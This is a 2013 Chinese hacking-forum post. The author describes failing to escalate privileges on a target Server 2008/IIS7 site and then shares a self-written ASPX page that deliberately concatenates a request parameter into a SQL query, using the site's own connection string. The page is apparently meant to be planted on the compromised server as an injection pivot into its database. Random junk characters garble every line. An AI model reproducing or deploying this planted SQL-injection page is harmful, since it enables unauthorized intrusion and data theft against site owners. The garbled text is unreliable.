昨天跟4z1看一个站点,提权很难提,看了整整5个小时,无果。 2008+iis7,无sa,无root,无各种服务。。。, O. s, k; d) T" @. I
其实中用到了aspx构造注射来跨站,网上找了一堆代码,没一个能用的。: ]$ t' R3 j; D/ L6 G4 I& L5 M
代码量不多,自己写个拉倒了。烦死了。5 k4 c) d6 z- e* ]
- u/ U7 a! F. M/ x1 c! B
" z+ d+ b6 W, y( a* |<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">6 k+ Z5 {5 |, l
<html xmlns="http://www.w3.org/1999/xhtml">, }4 t" ]+ _3 w/ `3 J2 F) m4 G* e7 S
<head runat="server">" D% Y( b) n) C: Y8 f* I! y( D w
<title>暗影aspx构造注射专用页面</title>
1 t+ {. }0 o! K. D; K</head>
6 p" ~- q+ _5 g* E& z<body>7 v0 D, o5 E% T* H) H" M
<form id="form1" runat="server">
9 I: B1 R0 K7 u2 H <div>
9 l& M2 b+ X/ Y5 y <script language="c#" runat="server">7 g. w4 v5 d% t# b" q
* h `1 n# s- p: {2 e* c void page_init(object sender, EventArgs e)6 d& t$ @8 C/ }# N b% p* `
{
% }7 @- D; e4 J h 9 N' `- K" [7 g* w2 Y; V) X
System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();. ]/ A9 u3 Y; O s% W' l
* D4 ^4 b* B( M$ e* |: U) y+ m( s conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();" t" Q6 G* u/ K- D
conn.Open();
5 f6 v' K2 W4 @5 A4 U
* w$ m+ H" ~) k* R- } string i = this.Page.Request.Params["xxser"]; //这里是参数?xxser=1
2 a' K: q7 k, L8 w1 s/ t
# ?+ q/ n+ M3 v3 C System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
0 ~0 z3 g) N M6 |! A% k int x = command.ExecuteNonQuery();
9 a" d7 a% f; f Response.Write(i+"\n");0 m+ T, R* O& e" [9 x# ?( G1 i
Response.Write(x);
# T& Y. g1 C! ?& D conn.Close();
+ _- f$ K6 w; L }
9 C& s# ]& ^ ?4 I5 r
5 v3 t9 T$ B0 Z( l </script>
# v/ ?8 n( U; g. L+ \# N3 H# ] </div>, s- a0 E. F8 X+ b& v/ y
</form>
9 l3 U" i; I1 @</body>
' H8 X0 ?' m# z3 F+ _1 x9 E</html>
5 z: P! K" l& G0 S, c! x' v |
发表于 2013-3-20 21:32:01
收藏
分享
支持
反对